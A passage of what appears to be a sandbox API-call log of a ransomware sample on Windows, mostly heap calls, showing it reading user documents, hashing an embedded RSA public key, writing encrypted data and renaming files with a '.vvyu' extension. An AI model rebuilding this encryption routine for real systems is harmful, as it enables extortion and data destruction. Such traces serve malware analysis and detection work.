hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93828 [0193.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93840 [0193.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0193.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x669ac0 [0193.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643b20 [0193.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x643b38 [0193.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0193.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643b08 [0193.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643af0 [0193.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657300 [0193.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643af0 | out: hHeap=0x620000) returned 1 [0193.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x643af0 [0193.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b08 | out: hHeap=0x620000) returned 1 [0193.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0193.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93840 [0193.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea0a68 [0193.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0193.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657300 | out: hHeap=0x620000) returned 1 [0193.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea0c78 [0193.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0193.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0193.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea0e90 [0193.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0c78 | out: hHeap=0x620000) returned 1 [0193.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e90 | out: hHeap=0x620000) returned 1 [0193.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643af0 | out: hHeap=0x620000) returned 1 [0193.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b38 | out: hHeap=0x620000) returned 1 [0193.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x669ac0 | out: hHeap=0x620000) returned 1 [0193.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b20 | out: hHeap=0x620000) returned 1 [0193.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93858 | out: hHeap=0x620000) returned 1 [0193.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6581d8 | out: hHeap=0x620000) returned 1 [0193.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.634] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xf29d, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xf29d, lpOverlapped=0x0) returned 1 [0193.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0193.635] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xf2a2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.635] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea0a68 [0193.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea0a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea0e98 [0193.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.637] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea0e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e98 | out: hHeap=0x620000) returned 1 [0193.637] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.637] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.637] CloseHandle (hObject=0x568) returned 1 [0193.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea0a68 [0193.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.639] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\DIjVxXA4.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\dijvxxa4.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\DIjVxXA4.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\dijvxxa4.xlsx.vvyu")) returned 1 [0193.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.641] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.644] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c62710, ftCreationTime.dwHighDateTime=0x1d8a5b9, ftLastAccessTime.dwLowDateTime=0x67b88a00, ftLastAccessTime.dwHighDateTime=0x1d8a63e, ftLastWriteTime.dwLowDateTime=0x67b88a00, ftLastWriteTime.dwHighDateTime=0x1d8a63e, nFileSizeHigh=0x0, nFileSizeLow=0x17789, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dnScTZWStNYxBfiQs.docx", cAlternateFileName="DNSCTZ~1.DOC")) returned 1 [0193.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6581d8 [0193.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0193.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6581d8 | out: hHeap=0x620000) returned 1 [0193.644] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\dnScTZWStNYxBfiQs.docx") returned=".docx" [0193.644] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\dnScTZWStNYxBfiQs.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\dnsctzwstnyxbfiqs.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.646] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=96137) returned 1 [0193.646] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.649] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x17763, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.649] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.651] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.651] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x17789, lpOverlapped=0x0) returned 1 [0193.653] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.653] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.653] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.654] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.654] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.654] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.655] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.655] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.655] GetLastError () returned 0x0 [0193.655] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.655] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.655] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.655] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.655] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x17790) returned 0x2ea79b0 [0193.656] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6581d8 [0193.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93858 [0193.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x658268 [0193.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93840 [0193.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93828 [0193.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657300 [0193.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0193.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.657] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea0a68 [0193.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657300 | out: hHeap=0x620000) returned 1 [0193.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657300 [0193.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0193.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657270 [0193.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x6572d0 [0193.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0193.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0193.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0193.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0193.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0193.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657300 | out: hHeap=0x620000) returned 1 [0193.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.660] GetCurrentThreadId () returned 0x66c [0193.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9f410 [0193.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.661] 